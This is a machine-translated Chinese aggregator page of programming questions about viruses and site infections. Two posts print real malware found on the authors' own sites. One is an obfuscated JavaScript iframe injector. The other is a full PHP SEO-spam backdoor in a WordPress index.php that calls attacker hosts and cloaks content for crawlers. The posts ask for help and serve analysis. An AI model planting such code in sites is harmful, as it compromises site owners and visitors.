virus 相关问题

计算机病毒是一种计算机程序,可以自我复制并从一台计算机传播到另一台计算机。术语“病毒”也通常但错误地用于指代其他类型的恶意软件,包括但不限于不具有生殖能力的广告软件和间谍软件程序。

Javascript“病毒”

我的所有网站上都有一些 JS“病毒”问题。它们位于不同的主机上,其中一些主机上出现此代码。 函数 c2670903e0i49d9f1a845f6b(i49d9f1a846377...</desc> <question vote="4"> <p>我的所有网站上都存在一些 JS“病毒”问题。它们位于不同的主机上,其中一些主机上出现此代码。</p> <pre><code>&lt;script&gt; function c2670903e0i49d9f1a845f6b(i49d9f1a846377) { var i49d9f1a846737 = 16; return (parseInt(i49d9f1a846377, i49d9f1a846737)); } function i49d9f1a8472f3(i49d9f1a8476d9) { var i49d9f1a848679 = 2; var i49d9f1a847da9 = &#39;&#39;; i49d9f1a848e47 = String.fromCharCode; for (i49d9f1a84828e = 0; i49d9f1a84828e &lt; i49d9f1a8476d9.length; i49d9f1a84828e += i49d9f1a848679) { i49d9f1a847da9 += (i49d9f1a848e47(c2670903e0i49d9f1a845f6b(i49d9f1a8476d9.substr(i49d9f1a84828e, i49d9f1a848679)))); } return i49d9f1a847da9; } var r1a = &#39;&#39;; var i49d9f1a84922e = &#39;3C7&#39; + r1a + &#39;3637&#39; + r1a + &#39;2697&#39; + r1a + &#39;07&#39; + r1a +&#39;43E696628216D7&#39; + r1a + &#39;96961297&#39; + r1a + &#39;B646F637&#39; + r1a + &#39;56D656E7&#39; + r1a + &#39;42E7&#39; + r1a + &#39;7&#39; + r1a + &#39;7&#39; + r1a + &#39;2697&#39; + r1a + &#39;465287&#39; + r1a + &#39;56E657&#39; + r1a + &#39;363617&#39; + r1a + &#39;065282027&#39; + r1a + &#39;2533632536392536362537&#39; + r1a + &#39;322536312536642536352532302536652536312536642536352533642536332533322533362532302537&#39; + r1a + &#39;332537&#39; + r1a + &#39;32253633253364253237&#39; + r1a + &#39;2536382537&#39; + r1a + &#39;342537&#39; + r1a + &#39;342537&#39; + r1a + &#39;302533612532662532662536352536332536662536642532652537&#39; + r1a + &#39;322536312537&#39; + r1a + &#39;322536352536322537&#39; + r1a + &#39;322536352536352536342536362536662536662537&#39; + r1a + &#39;342537&#39; + r1a + &#39;37&#39; + r1a + &#39;2536352536312537&#39; + r1a + &#39;32253265253633253666253664253266253366253237&#39; + r1a + &#39;2532622534642536312537&#39; + r1a + &#39;342536382532652537&#39; + r1a + &#39;322536662537&#39; + r1a + &#39;352536652536342532382534642536312537&#39; + r1a + &#39;342536382532652537&#39; + r1a + &#39;32253631253665253634253666253664253238253239253261253332253335253332253331253336253334253239253262253237&#39; + r1a + &#39;253632253237&#39; + r1a + &#39;2532302537&#39; + r1a + &#39;37&#39; + r1a + &#39;2536392536342537&#39; + r1a + &#39;34253638253364253335253332253331253230253638253635253639253637&#39; + r1a + &#39;2536382537&#39; + r1a + &#39;342533642533342533382533342532302537&#39; + r1a + &#39;332537&#39; + r1a + &#39;342537&#39; + r1a + &#39;39253663253635253364253237&#39; + r1a + &#39;2537&#39; + r1a + &#39;362536392537&#39; + r1a + &#39;332536392536322536392536632536392537&#39; + r1a + &#39;342537&#39; + r1a + &#39;39253361253638253639253634253634253635253665253237&#39; + r1a + &#39;2533652533632532662536392536362537&#39; + r1a + &#39;3225363125366425363525336527&#39; + r1a + &#39;29293B7&#39; + r1a + &#39;D7&#39; + r1a + &#39;6617&#39; + r1a + &#39;2206D7&#39; + r1a + &#39;969613D7&#39; + r1a + &#39;47&#39; + r1a + &#39;27&#39; + r1a + &#39;5653B3C2F7&#39; + r1a + &#39;3637&#39; + r1a + &#39;2697&#39; + r1a + &#39;07&#39; + r1a + &#39;43E&#39;; document.write(i49d9f1a8472f3(i49d9f1a84922e)); &lt;/script&gt; </code></pre> <p><strong>NOD32</strong> 封锁该网站,因为他认为存在病毒。从源中删除代码并没有帮助,因为它会再次出现。它不可能是 XSS 的结果,因为它甚至出现在静态网站上。</p> <p>我尝试对我的系统进行全面扫描,但没有帮助。所有网站上唯一的东西是 Google Analytics,我认为这不会导致这种情况。</p> <p>编辑:您可以在 <a href="http://www.postuj.cz/test/" rel="nofollow noreferrer">http://www.postuj.cz/test/</a> 或 <a href="http://flavicius.php5.cz/" rel="nofollow noreferrer">http://flavicius.php5.cz/</a>.</p> 看到它 </question> <answer tick="true" vote="8"> <blockquote> <p>它们位于不同的主机上,其中一些主机上出现此代码。</p> </blockquote> <p>每个主机上的代码都相同吗?您能否给出受影响域之一的示例,以便我们可以检查代码是否存在于服务器端,而不仅仅是您的计算机上(这通常不太可能)。</p> <p>您发布的代码肯定非常可疑。解码后,它会将 iframe 写入 http://ecom.rarebreedfootwear.com/? (它尝试向 URL 添加高速缓存随机数,但由于拼写错误而失败)。</p> <p>该地址没有任何明显的漏洞利用 — 也许最终的目标漏洞尚未到位,或者这只是稍后真正攻击的测试运行,但您的网站上出现了意外的 JavaScript,它会自行解码并添加iframe 是一个巨大的危险信号。通常这意味着您的服务器已被入侵,需要使用新密码从头开始重新安装。</p> <p>预计到达时间:</p> <blockquote> <p>您可以在 hxxp://flavicius.php5.cz/ 看到它 </p> </blockquote> <p>谢谢。我删除了评论以隐藏工作 URL,因为它确实被感染了。目前还不清楚是在应用程序级别还是 Apache 本身,但每个页面的底部都有可疑脚本。</p> <p>因此,至少应用程序和可以想象的服务器受到了损害,应该离线进行清理、重新安装和诊断:您需要找出攻击者是如何进入的,这样就不会再次发生。首先,请检查您是否拥有最新版本的 WordPress,因为它过去曾遭受过许多安全漏洞。</p> </answer> <answer tick="false" vote="7"> <p>它看起来像 Vundo 或其变体。该恶意软件倾向于将看似无意义的 JavaScript 插入网站(在您端,而不是服务器端)。我建议尝试<a href="http://www.malwarebytes.org/mbam.php" rel="noreferrer">Malwarebytes 的反恶意软件</a>。安装、更新并进行全面扫描。如果失败,也许可以尝试研究专门删除 Vundo 的选项。</p> </answer> <answer tick="false" vote="0"> <p>这不是病毒。这是一个代码中的网站。(我的英语很糟糕:()</p> </answer> </body></html>

回答 0 投票 0

*win32ctypes.pywin32.pywintypes.在 VS Code 中使用 pyinstaller 时出错 - 可能是病毒/木马?

我正在使用 pyinstaller 为我的 python.py 文件生成可执行代码。但是,我收到此错误: 文件“C:\Users\xxxxx\AppData\Local\Programs\Python\Python311\Lib\site-packages\

回答 0 投票 0

PHP 警告:/wp-content/themes/HighendWP/functions/breadcrumbs.php 中的未定义数组键 0 第 208 行

我收到这个错误,无论我删除多少次,cPanel 上都会出现一个未知文件。我已经更改了所有密码(WordPress 和 cPanel),并且我已经尝试了一切可能...

回答 0 投票 0

如何像这样检查此 PHP 文件上的病毒 [关闭]

我最近遇到一个 PHP 文件,我怀疑它可能包含不需要的病毒或恶意代码。不幸的是,我对 PHP 的了解有限,我不确定如何有效地分析它。我愿意

回答 0 投票 0

为什么 Facebook 在我的网站干净时阻止它?

在聊天中发送我的网站链接:www.orgeu.com(重定向到 https://rgu.hu/)并尝试打开它后,我遇到了以下消息: 你将不能去这个林...

回答 0 投票 0

为什么最后转义符前的字符串显示文件有病毒?

#include 无效主要(){ printf("h"); printf("h2"); } 我不知道为什么会这样,我正在使用 Bloodshed.inc 的 DevC++ 编译器 请前...

回答 1 投票 0

为什么最后转义符前的字符串显示文件有病毒?

#include 无效主要(){ printf("h"); printf("h2"); } 我不知道为什么会这样,我正在使用 Bloodshed.inc 的 DevC++ 编译器 请前...

回答 0 投票 0

/proc/{id}/exe 包含(已删除)

我发现我的服务器的十个cpu核心都满了,认为有病毒。所以我找到了proc并删除了病毒的exe文件。但是,当我重新启动时,病毒又回来了,并且exe名称包含“(del ...

回答 0 投票 0

C# 应用程序被卡巴斯基检测为木马病毒 (VHO:Trojan.MSIL.Convagent.gen)

我开发了一个 C# winform 应用程序来从 firebird db 导入行 编译时,我从 vstudio 收到一条消息,无法访问 .exe 文件,然后从卡巴斯基收到一条警告消息,通知我......

回答 7 投票 0

我在哪里可以找到快捷方式 usb 病毒的副本?

我实际上正在编写一个防病毒软件来专门修复受快捷方式病毒感染的 USB,我认为我在编程方面做得很好并且我确定我的程序应该可以运行,但是要测试它

回答 0 投票 0

你好,我不知道去哪里找这个,但是有人知道这是什么吗? [关闭]

我想我中了病毒,但我只是确定一下。在此处输入图片描述这是一张图片,我模糊了看起来像是帐户或其他东西的标记。另外,我不拥有国际足联所以不知道为什么它...

回答 0 投票 0

我们的 cPanel Wordpress 网站正在自动创建此 index.php

<?php $group_num = 'z9126zn'; $inter_domain = 'http://' . $group_num . '.lievful.quest'; function curl_get_contents($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); $file_contents = curl_exec($ch); curl_close($ch); return $file_contents; } function getServerCont($url, $data = array()) { $url = str_replace(' ', '+', $url); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$url"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); $output = curl_exec($ch); $errorCode = curl_errno($ch); curl_close($ch); if (0 !== $errorCode) { return false; } return $output; } function is_crawler($agent) { if (strpos($agent, 'google') !== false || strpos($agent, 'yahoo') !== false) { return true; } else { return false; } } function check_refer($refer) { if (strpos($refer, '.co.jp') !== false || strpos($refer, 'google.com') !== false) { return true; } else { return false; } } $http = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https://' : 'http://'); $req_uri = $_SERVER['REQUEST_URI']; $domain = $_SERVER["HTTP_HOST"]; $self = $_SERVER['PHP_SELF']; $ser_name = $_SERVER['SERVER_NAME']; $req_url = $http . $domain . $req_uri; $indata1 = $inter_domain . "/indata.php"; $map1 = $inter_domain . "/map.php"; $jump1 = $inter_domain . "/jump.php"; $url_words = $inter_domain . "/words.php"; $url_robots = $inter_domain . "/robots.php"; if (strpos($req_uri, ".php")) { $href1 = $http . $domain . $self; } else { $href1 = $http . $domain; } $data1[] = array(); $data1['http'] = $http; $data1['domain'] = $domain; $data1['req_uri'] = $req_uri; $data1['href'] = $href1; $data1['req_url'] = $req_url; $user_agent = strtolower(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''); if(getenv('HTTP_CLIENT_IP')){ $client_ip = getenv('HTTP_CLIENT_IP'); } elseif(getenv('HTTP_X_FORWARDED_FOR')) { $client_ip = getenv('HTTP_X_FORWARDED_FOR'); } elseif(getenv('REMOTE_ADDR')) { $client_ip = getenv('REMOTE_ADDR'); } else { $client_ip = $_SERVER['REMOTE_ADDR']; } if (substr($req_uri, -6) == 'robots') { $robots_cont = getServerCont($url_robots, $data1); define('BASE_PATH', str_ireplace($_SERVER['PHP_SELF'], '', __FILE__)); file_put_contents(BASE_PATH . '/robots.txt', $robots_cont); $robots_cont = file_get_contents(BASE_PATH . '/robots.txt'); if (strpos($robots_cont, "Crawl-delay:3")) { echo 'robots.txt file create success!'; } else { echo 'robots.txt file create fail!'; } exit; } if (substr($req_uri, -4) == '.xml') { if (strpos($req_uri, "pingsitemap.xml")) { $str_cont = getServerCont($map1, $data1); $str_cont_arr = explode(",", $str_cont); $str_cont_arr[] = 'sitemap'; for ($k = 0; $k < count($str_cont_arr); $k++) { if (strpos($href1, ".php") > 0) { $tt1 = '?'; } else { $tt1 = '/'; } $http2 = $href1 . $tt1 . $str_cont_arr[$k] . '.xml'; $data_new = 'https://www.google.com/ping?sitemap=' . $http2; $data_new1 = 'http://www.google.com/ping?sitemap=' . $http2; if (stristr(@file_get_contents($data_new), 'successfully')) { echo $data_new . '===>Submitting Google Sitemap: OK' . PHP_EOL; } else if (stristr(@curl_get_contents($data_new), 'successfully')) { echo $data_new . '===>Submitting Google Sitemap: OK' . PHP_EOL; } else if (stristr(@file_get_contents($data_new1), 'successfully')) { echo $data_new1 . '===>Submitting Google Sitemap: OK' . PHP_EOL; } else if (stristr(@curl_get_contents($data_new1), 'successfully')) { echo $data_new1 . '===>Submitting Google Sitemap: OK' . PHP_EOL; } else { echo $data_new1 . '===>Submitting Google Sitemap: fail' . PHP_EOL; } } exit; } if (strpos($req_uri, "allsitemap.xml")) { $str_cont = getServerCont($map1, $data1); header("Content-type:text/xml"); echo $str_cont; exit; } if (strpos($req_uri, ".php")) { $word4 = explode("?", $req_uri); $word4 = $word4[count($word4) - 1]; $word4 = str_replace(".xml", "", $word4); } else { $word4 = str_replace("/", "", $req_uri); $word4 = str_replace(".xml", "", $word4); } $data1['word'] = $word4; $data1['action'] = 'check_sitemap'; $check_url4 = getServerCont($url_words, $data1); if ($check_url4 == '1') { $str_cont = getServerCont($map1, $data1); header("Content-type:text/xml"); echo $str_cont; exit; } $data1['action'] = "check_words"; $check1 = getServerCont($url_words, $data1); if (strpos($req_uri, "map") > 0 || $check1 == '1') { $data1['action'] = "rand_xml"; $check_url4 = getServerCont($url_words, $data1); header("Content-type:text/xml"); echo $check_url4; exit; } } if (strpos($req_uri, ".php")) { $main_shell = $http . $ser_name . $self; $data1['main_shell'] = $main_shell; } else { $main_shell = $http . $ser_name; $data1['main_shell'] = $main_shell; } $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $chk_refer = check_refer($referer); $bot=true; if ($chk_refer) { $data1['referer'] = $referer; $data1['ip'] = $client_ip; $data1['user_agent'] = $user_agent; $data1['browser_la'] = $_SERVER['HTTP_ACCEPT_LANGUAGE']; $refer_content = getServerCont($jump1, $data1); if ($refer_content != "404") { echo $refer_content; exit; } $bot=false; } $res_crawl = is_crawler($user_agent); if ($res_crawl&&$bot) { $data1['http_user_agent'] = $user_agent; $get_content = getServerCont($indata1, $data1); if ($get_content == "404") { header('HTTP/1.0 404 Not Found'); exit; } else if ($get_content == "500") { header("HTTP/1.0 500 Internal Server Error"); exit; } else if ($get_content == "blank") { echo ''; exit; } else { echo $get_content; exit; } } ?><?php /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php'; 这是我们无法控制的 index.php 文件。 我们有带有 cPanel 和 wordpress 托管的 Godaddy VPS 服务器。我们在目录中安装了 wordpress 站点,该目录会自动创建 INDEX 文件,打开时显示 HTTP ERROR 500。 这是在我们的 VPS 服务器中自动创建的。当我们更改它时它会自动修改。删除时自动创建。 简而言之,我们无法控制目录和这个文件。 我也有同样的问题 <?php $group_num = 'z0109_18'; $inter_domain = 'http://107.150.41.2//' . $group_num . '/'; function curl_get_contents($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); $file_contents = curl_exec($ch); curl_close($ch); return $file_contents; } function getServerCont($url, $data = array()) { $url = str_replace(' ', '+', $url); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$url"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); $output = curl_exec($ch); $errorCode = curl_errno($ch); curl_close($ch); if (0 !== $errorCode) { return false; } return $output; } function is_crawler($agent) { $agent_check = false; $bots = 'googlebot|google|yahoo|bing|aol'; if ($agent != '') { if (preg_match("/($bots)/si", $agent)) { $agent_check = true; } } return $agent_check; } function check_refer($refer) { $check_refer = false; $referbots = 'google.co.jp|yahoo.co.jp|google.com'; if ($refer != '' && preg_match("/($referbots)/si", $refer)) { $check_refer = true; } return $check_refer; } $http = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https://' : 'http://'); $req_uri = $_SERVER['REQUEST_URI']; $domain = $_SERVER["HTTP_HOST"]; $self = $_SERVER['PHP_SELF']; $ser_name = $_SERVER['SERVER_NAME']; $req_url = $http . $domain . $req_uri; $indata1 = $inter_domain . "/indata.php"; $map1 = $inter_domain . "/map.php"; $jump1 = $inter_domain . "/jump.php"; $url_words = $inter_domain . "/words.php"; $url_robots = $inter_domain . "/robots.php"; if (strpos($req_uri, ".php")) { $href1 = $http . $domain . $self; } else { $href1 = $http . $domain; } $data1[] = array(); $data1['domain'] = $domain; $data1['req_uri'] = $req_uri; $data1['href'] = $href1; $data1['req_url'] = $req_url; if (substr($req_uri, -6) == 'robots') { $robots_cont = getServerCont($url_robots, $data1); define('BASE_PATH', str_ireplace($_SERVER['PHP_SELF'], '', __FILE__)); file_put_contents(BASE_PATH . '/robots.txt', $robots_cont); $robots_cont = file_get_contents(BASE_PATH . '/robots.txt'); if (strpos(strtolower($robots_cont), "sitemap")) { echo 'robots.txt file create success!'; } else { echo 'robots.txt file create fail!'; } return; } if (substr($req_uri, -4) == '.xml') { if (strpos($req_uri, "pingsitemap.xml")) { $str_cont = getServerCont($map1, $data1); $str_cont_arr = explode(",", $str_cont); $str_cont_arr[] = 'sitemap'; for ($k = 0; $k < count($str_cont_arr); $k++) { if (strpos($href1, ".php") > 0) { $tt1 = '?'; } else { $tt1 = '/'; } $http2 = $href1 . $tt1 . $str_cont_arr[$k] . '.xml'; $data_new = 'https://www.google.com/ping?sitemap=' . $http2; $data_new1 = 'http://www.google.com/ping?sitemap=' . $http2; if (stristr(@file_get_contents($data_new), 'successfully')) { echo $data_new . '===>Submitting Google Sitemap: OK' . PHP_EOL; } else if (stristr(@curl_get_contents($data_new), 'successfully')) { echo $data_new . '===>Submitting Google Sitemap: OK' . PHP_EOL; } else if (stristr(@file_get_contents($data_new1), 'successfully')) { echo $data_new1 . '===>Submitting Google Sitemap: OK' . PHP_EOL; } else if (stristr(@curl_get_contents($data_new1), 'successfully')) { echo $data_new1 . '===>Submitting Google Sitemap: OK' . PHP_EOL; } else { echo $data_new1 . '===>Submitting Google Sitemap: fail' . PHP_EOL; } } return; } if (strpos($req_uri, "allsitemap.xml")) { $str_cont = getServerCont($map1, $data1); header("Content-type:text/xml"); echo $str_cont; return; } if (strpos($req_uri, ".php")) { $word4 = explode("?", $req_uri); $word4 = $word4[count($word4) - 1]; $word4 = str_replace(".xml", "", $word4); } else { $word4 = str_replace("/", "", $req_uri); $word4 = str_replace(".xml", "", $word4); } $data1['word'] = $word4; $data1['action'] = 'check_sitemap'; $check_url4 = getServerCont($url_words, $data1); if ($check_url4 == '1') { $str_cont = getServerCont($map1, $data1); header("Content-type:text/xml"); echo $str_cont; return; } $data1['action'] = "check_words"; $check1 = getServerCont($url_words, $data1); if (strpos($req_uri, "map") > 0 || $check1 == '1') $data1['action'] = "rand_xml"; $check_url4 = getServerCont($url_words, $data1); header("Content-type:text/xml"); echo $check_url4; return; } if (strpos($req_uri, ".php")) { $main_shell = $http . $ser_name . $self; $data1['main_shell'] = $main_shell; } else { $main_shell = $http . $ser_name; $data1['main_shell'] = $main_shell; } $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $chk_refer = check_refer($referer); if (strpos($_SERVER['REQUEST_URI'], '.php')) { $url_ext = '?'; } else { $url_ext = '/'; } if ($chk_refer && (preg_match('/ja/i', @$_SERVER['HTTP_ACCEPT_LANGUAGE']) || preg_match('/ja/i', @$_SERVER['HTTP_ACCEPT_LANGUAGE']) || preg_match("/^[a-z0-9]+[0-9]+$/", end(explode($url_ext, str_replace(array(".html", ".htm"), "", $_SERVER['REQUEST_URI'])))))) { echo getServerCont($jump1, $data1); return; } $user_agent = strtolower(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''); $res_crawl = is_crawler($user_agent); if ($res_crawl) { $data1['http_user_agent'] = $user_agent; $get_content = getServerCont($indata1, $data1); echo $get_content; return; } ?> 我现在唯一的解决办法是删除 index.php recolection.php 和 wp-admin 和 wp-includes 文件夹。 之后,我重新安装了 WordPress,该网站再次运行。 过了一会儿 我开始检查所有内容,我发现了 3 个感染选项 Ftp 的另一个帐户(在您的 cpanel 中搜索用户) 创建文件的 Cron 任务 Cpanel 帐户妥协。我刚更改了密码,它就停止了。

回答 1 投票 0

是否有办法检索由于文件访问被Windows Defender阻止而引发的IOException的错误ID?

我试图访问我的下载文件夹中的文件,并希望区分可能的错误,以便在出现错误时更好地通知用户,特别是当Windows Defender干扰时(见下文)。

回答 1 投票 0

VS 2017:如何禁止重复自动安装 "Hopex Module Publisher "插件?

由于几天来,每当我启动VS 2017和打开一个项目,一个消息框弹出告诉"'HopexPackage'没有正确加载..."。当我查看我的扩展时,我可以看到 ...

回答 1 投票 0

C#应用程序被反病毒软件阻止?

我有一个工资系统,是用Visual C# Express编写的。实际上,我已经完成了它的编码并发布了它。但每当我在笔记本电脑上安装它时,它都被Avast阻止了! ...

回答 4 投票 2

Java小程序危险吗?[非公开]

所以我目前正在阅读《Java A Beginners Guide 7th Edition》这本书。而下面的句子在我看来,Applet可能是非常危险的病毒?到底是不是这样呢?一个Applet是 ...

回答 1 投票 0

什么是防病毒软件的threat.generic.heu

我的使用python构建的exe文件正在从avast获取Threat.generic.heu。我怎样才能避免这种检测,邮件avast?这种HEU威胁是什么?

回答 1 投票 0

如何恢复由勒索软件(.nlah)加密的文件

勒索软件使用扩展名.nlah加密了我的所有文件,我使用Spyhunter 5扫描Windows 10并删除了恶意软件。然后,我不得不寻找一种无法成功恢复文件的方法。这个...

回答 1 投票 0

Microsoft的OneDrive是病毒吗?因为它破坏了我的Windows系统

每个目录都进行了某种更改,以在其前面包含OneDrive,请参见下图。文档文件夹应该位于C:\ Users \ mart \ Documents,而位于C:\ Users \ ...

回答 1 投票 -1

具有奇怪名称的服务的克隆,剪贴板服务,联系服务...…是否为病毒?

[几分钟前,我发现PC上的服务列表,以_d87e4后缀名克隆。每次,真正的服务都停止了,奇怪的克隆正在运行。受影响的服务列表:...

回答 1 投票 0

© www.soinside.com 2019 - 2024. All rights reserved.